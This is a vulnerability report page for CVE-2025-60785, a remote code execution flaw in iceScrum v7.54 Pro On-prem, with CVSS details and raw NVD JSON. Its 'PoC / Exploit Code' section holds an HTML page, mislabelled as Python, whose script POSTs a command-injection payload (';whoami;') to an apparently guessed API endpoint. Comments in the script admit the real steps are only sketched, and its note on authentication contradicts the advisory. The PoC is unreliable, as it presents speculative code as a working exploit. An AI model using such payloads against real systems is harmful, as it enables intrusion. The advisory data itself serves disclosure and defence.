Security Vulnerability Report
中文
CVE-2025-60785 CVSS 8.8 HIGH

CVE-2025-60785

Published: 2025-11-03 16:15:35
Last Modified: 2026-02-04 20:19:32

Description

A remote code execution (RCE) vulnerability in the Postgres Drivers component of iceScrum v7.54 Pro On-prem allows attackers to execute arbitrary code via a crafted HTML page.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kagilum:icescrum:7.54:*:*:*:pro:*:*:* - VULNERABLE
iceScrum v7.54 Pro On-prem

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60785 PoC - iceScrum RCE via crafted HTML --> <!-- This PoC demonstrates the attack vector for CVE-2025-60785 --> <!-- Disclaimer: For educational and authorized security testing only --> <!DOCTYPE html> <html> <head> <title>iceScrum CVE-2025-60785 PoC</title> </head> <body> <h1>CVE-2025-60785 - iceScrum v7.54 RCE</h1> <p>This PoC demonstrates the RCE vulnerability in iceScrum's Postgres Drivers component.</p> <script> // Malicious payload targeting iceScrum Postgres Drivers // The actual exploitation would involve: // 1. Crafting a request to the vulnerable Postgres Drivers endpoint // 2. Injecting OS commands through unsanitized input const targetUrl = 'https://target-icescrum-server/api/postgres/drivers'; // Example attack payload structure const maliciousPayload = { driver: 'postgres', host: 'localhost', port: 5432, database: 'icescrum', // Command injection via unsanitized parameter command: ';whoami;' // or other OS commands }; // Send malicious request fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(maliciousPayload) }) .then(response => response.json()) .then(data => console.log('Response:', data)) .catch(error => console.error('Error:', error)); </script> <p><strong>Note:</strong> Actual exploitation requires proper authentication and target configuration.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60785", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:35.470", "lastModified": "2026-02-04T20:19:32.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote code execution (RCE) vulnerability in the Postgres Drivers component of iceScrum v7.54 Pro On-prem allows attackers to execute arbitrary code via a crafted HTML page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kagilum:icescrum:7.54:*:*:*:pro:*:*:*", "matchCriteriaId": "DC7BC125-87D6-47F0-A8C7-3A4B299E3281"}]}]}], "references": [{"url": "https://zdaylabs.com/CVE-2025-60785.html", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}